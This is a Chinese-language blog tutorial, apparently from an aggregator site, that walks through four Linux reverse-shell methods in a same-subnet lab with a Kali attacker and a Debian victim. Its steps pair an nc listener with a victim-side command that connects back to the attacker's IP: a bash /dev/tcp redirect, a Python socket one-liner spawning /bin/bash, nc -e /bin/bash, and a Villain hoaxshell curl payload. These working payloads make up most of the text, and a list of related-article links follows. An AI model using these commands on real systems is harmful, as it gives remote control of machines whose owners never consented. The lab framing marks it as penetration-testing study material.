当前位置: 首页 > news >正文

2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

      一台kali的linux(攻击者)

        一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

 

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

 

二、python反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

三、nc反弹shell

 注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

whoami

四、villain反弹shell

   1、kali(攻击者)运行命令

 ①运行villain,需要先安装哦

villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

shell sessionID

③whoami看一下权限 

whoami


http://www.mrgr.cn/news/71225.html

相关文章:

  • 小面馆叫号取餐流程 佳易王面馆米线店点餐叫号管理系统操作教程
  • 前端基础的讲解-JS(10)
  • PHP:通往动态Web开发世界的桥梁
  • Flutter-左侧导航栏跟随窗口的宽变化
  • 修改msyql用户密码及更新mysql密码策略
  • 中断的硬件框架
  • 【机器学习】K近邻算法
  • 7天用Go从零实现分布式缓存GeeCache(学习)(3)
  • CTF-RE 从0到N: windows反调试-获取Process Environment Block(PEB)信息来检测调试
  • Go开发指南-Gin与Web开发
  • android studio 配置过程
  • 开启鸿蒙开发之旅:核心组件及其各项属性介绍——布局容器组件2
  • Mysql高可用架构方案
  • 如何在60分钟内进行ASO竞争对手分析(App Store 和 Google Play Store)
  • seatunnel常用集群操作命令
  • 鸿蒙系统(HarmonyOS)与OpenHarmony
  • notepad++下载安装教程
  • 全球碳循环数据集(2000-2023)包括总初级生产力、生态系统净碳交换和生态系统呼吸变量
  • upload-labs通关练习---更新到15关
  • 【Conda】Windows下conda的安装并在终端运行
  • 第三百二十节 Java线程教程 - Java线程中断、Java Volatile变量
  • 3349、检测相邻递增子数组 Ⅰ
  • golang如何实现sse
  • 一文熟悉redis安装和字符串基本操作
  • 37 string类关键函数的模拟实现
  • 【网络安全渗透测试零基础入门】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了!